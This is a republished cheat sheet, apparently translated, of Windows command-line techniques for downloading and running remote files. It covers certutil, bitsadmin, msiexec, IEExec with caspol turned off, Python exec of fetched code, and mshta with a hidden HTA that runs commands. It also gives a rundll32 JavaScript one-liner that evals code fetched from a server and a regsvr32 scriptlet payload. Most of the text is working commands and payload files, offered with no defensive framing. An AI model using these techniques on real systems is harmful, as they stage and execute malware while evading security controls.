Summary of the "Tips Summary" command line download file under Windows

Source: Internet
Author: User

0x00 Powershell

Win2003, WinXP not supported

$client = new-object System.Net.WebClient$client.DownloadFile(‘http://payloads.online/file.tar.gz’, ‘E:\file.tar.gz’)

Download files via IE

$ie = New-Object -Com internetExplorer.Application$ie.Navigate("https://site.com/somefile") #------------------------------#Wait for Download Dialog box to pop upSleep 5while($ie.Busy){Sleep 1}#------------------------------ #Hit "S" on the keyboard to hit the "Save" button on the download box$obj = new-object -com WScript.Shell$obj.AppActivate(‘Internet Explorer‘)$obj.SendKeys(‘s‘) #Hit "Enter" to save the file$obj.SendKeys(‘{Enter}‘) #Closes IE Downloads window$obj.SendKeys(‘{TAB}‘)$obj.SendKeys(‘{TAB}‘)$obj.SendKeys(‘{TAB}‘)$obj.SendKeys(‘{Enter}‘)
0x01 FTP

FTP 192.168.3.2

After you enter your user name and password

LCD E:\file # Enter the file directory under the E-drive

CD www # Enter the WWW directory on the server

Get access.log # Download the Access.log on the server to E:\file

Refer to: https://baike.baidu.com/item/ftp/13839

0x02 ipc$
copy \\192.168.3.1\c$\test.exe E:\file
0x03 Certutil

Refer to: https://technet.microsoft.com/zh-cn/library/cc773087 (ws.10). aspx

Applied to: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2

certutil.exe -urlcache -split -f http://192.168.3.1/test.txt file.txt
0x04 bitsadmin

Refer to: https://msdn.microsoft.com/en-us/library/aa362813 (v=vs.85). aspx

    1、bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:\file\test.txt    2、bitsadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:\file\test.txt
0x05 msiexec
msiexec /q /i http://192.168.3.1/test.txt
0x06 ieexec
C:\Windows\Microsoft.NET\Framework\v2.0.50727> caspol -s offC:\Windows\Microsoft.NET\Framework\v2.0.50727> IEExec http://192.168.3.1/test.exe
0x07 python
C:\python27\python.exe -c “import urllib2; exec urllib2.urlopen(‘http://192.168.3.1/test.zip’).read();”
0x08 Mshta
mshta http://192.168.3.1/run.hta

Run.hta content is as follows:

<HTML> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"><HEAD> <script language="VBScript">Window.ReSizeTo 0, 0Window.moveTo -2000,-2000Set objShell = CreateObject("Wscript.Shell")objShell.Run "cmd.exe /c net user" // 这里填写命令self.close</script><body>demo</body></HEAD> </HTML>
0x09 rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%

In fact, it relies on the Wscript.Shell component.

0x10 regsvr32
regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll

Test.data content:

<?XML version="1.0"?><scriptlet><registration    progid="ShortJSRAT"    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >    <!-- Learn from Casey Smith @subTee -->    <script language="JScript">        <![CDATA[            ps  = "cmd.exe /c calc.exe";            new ActiveXObject("WScript.Shell").Run(ps,0,true);        ]]></script></registration></scriptlet>

You can also use Https://github.com/CroweCybersecurity/ps1encode to generate the SCT (COM scriptlet-requires a webserver to stage the payload)

regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll

Summary of the "Tips Summary" command line download file under Windows

Related Article

E-Commerce Solutions

Leverage the same tools powering the Alibaba Ecosystem

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.